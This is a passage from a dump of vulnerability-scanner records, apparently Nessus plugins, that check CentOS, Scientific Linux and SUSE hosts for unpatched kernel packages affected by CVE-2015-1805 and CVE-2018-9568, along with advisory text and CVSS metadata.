retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs :\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi\ncommand timeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing.\n(BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in\nthe shrink_zone() function even though the vm.max_reclaims_in_progress\nfeature was set to 1. This update provides a patch fixing the\nunderlying source code, and spinlock contention no longer occurs in\nthis scenario. (BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from\nit, failed to reset the retransmission timestamp. As a consequence, on\ncertain connections, if a packet had to be re-transmitted, the\nretrans_stamp variable was only cleared when the next acked packet was\nreceived. This could lead to an early abortion of the TCP connection\nif this next packet also got lost. With this update, the socket clears\nretrans_stamp when the recovery is completed, thus fixing the bug.\n(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and\nthe kernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red\nHat Enterprise Linux 5 Virtual Machine (VM). With this update, the new\nsize is now reflected online immediately in a Red Hat Enterprise Linux\n5 VM so it is no longer necessary to reboot the VM to see the new disk\nsize. (BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021156.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6dfa28c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1805\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-doc-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-devel-2.6.18-406.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:48:47", "description": " - It was found that the Linux kernel's implementation of\n vectored pipe read and write functionality did not take\n into account the I/O vectors that were already processed\n when retrying after a failed atomic access operation,\n potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could\n use this flaw to crash the system or, potentially,\n escalate their privileges on the system. (CVE-2015-1805,\n Important)\n\nThis update fixes the following bugs :\n\n - Due to a bug in the lpfc_device_reset_handler()\n function, a scsi command timeout could lead to a system\n crash. With this update, lpfc_device_reset_handler\n recovers storage without crashing.\n\n - Due to the code decrementing the reclaim_in_progress\n counter without having incremented it first, severe\n spinlock contention occurred in the shrink_zone()\n function even though the vm.max_reclaims_in_progress\n feature was set to 1. This update provides a patch\n fixing the underlying source code, and spinlock\n contention no longer occurs in this scenario.\n\n - A TCP socket using SACK that had a retransmission but\n recovered from it, failed to reset the retransmission\n timestamp. As a consequence, on certain connections, if\n a packet had to be re-transmitted, the retrans_stamp\n variable was only cleared when the next acked packet was\n received. This could lead to an early abortion of the\n TCP connection if this next packet also got lost. With\n this update, the socket clears retrans_stamp when the\n recovery is completed, thus fixing the bug.\n\n - Previously, the signal delivery paths did not clear the\n TS_USEDFPU flag, which could cause problems in the\n switch_to() function and lead to floating-point unit\n (FPU) corruption. With this update, TS_USEDFPU is\n cleared as expected, and FPU is no longer under threat\n of corruption.\n\n - A race condition in the exit_sem() function previously\n caused the semaphore undo list corruption. As a\n consequence, a kernel crash could occur. The corruption\n in the semaphore undo list has been fixed, and the\n kernel no longer crashes in this situation.\n\n - Previously, when running the 'virsh blockresize [Device]\n [Newsize]' command to resize the disk, the new size was\n not reflected in a Scientific Linux 5 Virtual Machine\n (VM). With this update, the new size is now reflected\n online immediately in a Scientific Linux 5 VM so it is\n no longer necessary to reboot the VM to see the new disk\n size.\n\nThe system must be rebooted for this update to take effect.", "edition": 16, "published": "2015-06-03T00:00:00", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64 (20150602)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2015-06-03T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-xen-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:kernel-xen-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-xen", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE-devel"], "id": "SL_20150602_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/83969", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83969);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-1805\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64 (20150602)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - It was found that the Linux kernel's implementation of\n vectored pipe read and write functionality did not take\n into account the I/O vectors that were already processed\n when retrying after a failed atomic access operation,\n potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could\n use this flaw to crash the system or, potentially,\n escalate their privileges on the system. (CVE-2015-1805,\n Important)\n\nThis update fixes the following bugs :\n\n - Due to a bug in the lpfc_device_reset_handler()\n function, a scsi command timeout could lead to a system\n crash. With this update, lpfc_device_reset_handler\n recovers storage without crashing.\n\n - Due to the code decrementing the reclaim_in_progress\n counter without having incremented it first, severe\n spinlock contention occurred in the shrink_zone()\n function even though the vm.max_reclaims_in_progress\n feature was set to 1. This update provides a patch\n fixing the underlying source code, and spinlock\n contention no longer occurs in this scenario.\n\n - A TCP socket using SACK that had a retransmission but\n recovered from it, failed to reset the retransmission\n timestamp. As a consequence, on certain connections, if\n a packet had to be re-transmitted, the retrans_stamp\n variable was only cleared when the next acked packet was\n received. This could lead to an early abortion of the\n TCP connection if this next packet also got lost. With\n this update, the socket clears retrans_stamp when the\n recovery is completed, thus fixing the bug.\n\n - Previously, the signal delivery paths did not clear the\n TS_USEDFPU flag, which could cause problems in the\n switch_to() function and lead to floating-point unit\n (FPU) corruption. With this update, TS_USEDFPU is\n cleared as expected, and FPU is no longer under threat\n of corruption.\n\n - A race condition in the exit_sem() function previously\n caused the semaphore undo list corruption. As a\n consequence, a kernel crash could occur. The corruption\n in the semaphore undo list has been fixed, and the\n kernel no longer crashes in this situation.\n\n - Previously, when running the 'virsh blockresize [Device]\n [Newsize]' command to resize the disk, the new size was\n not reflected in a Scientific Linux 5 Virtual Machine\n (VM). With this update, the new size is now reflected\n online immediately in a Scientific Linux 5 VM so it is\n no longer necessary to reboot the VM to see the new disk\n size.\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1506&L=scientific-linux-errata&F=&S=&P=2521\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?445adbb2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-debuginfo-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-debuginfo-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debuginfo-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debuginfo-common-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-debuginfo-2.6.18-406.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-406.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-28T10:59:12", "description": "This update for the Linux Kernel 3.12.74-60_64_107 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-9568: Prevent possible memory corruption due to type\nconfusion in sk_clone_lock. This could lead to local privilege\nescalation (bsc#1118319).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-18T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:4158-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-9568"], "modified": "2018-12-18T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_96-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_99-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_107-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_107-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_96-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_99-default"], "id": "SUSE_SU-2018-4158-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119747", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:4158-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119747);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/27\");\n\n script_cve_id(\"CVE-2018-9568\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:4158-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_107 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-9568: Prevent possible memory corruption due to type\nconfusion in sk_clone_lock. This could lead to local privilege\nescalation (bsc#1118319).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1118319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1118320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-9568/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20184158-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?240ff3ad\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-2951=1 SUSE-SLE-SERVER-12-SP1-2018-2953=1\nSUSE-SLE-SERVER-12-SP1-2018-2957=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_107-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_107-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_96-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_96-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_99-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_99-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_107-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_107-xen-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_96-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_96-xen-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_99-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_99-xen-6-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-28T10:59:14", "description": "This update for the Linux Kernel 3.12.61-52_141 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-9568: Prevent possible memory corruption due to type\nconfusion in sk_clone_lock. This could lead to local privilege\nescalation (bsc#1118319).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-20T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:4196-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-9568"], "modified": "2018-12-20T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-default"], "id": "SUSE_SU-2018-4196-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119810", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:4196-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119810);\n script_version(\"1.4\");\n 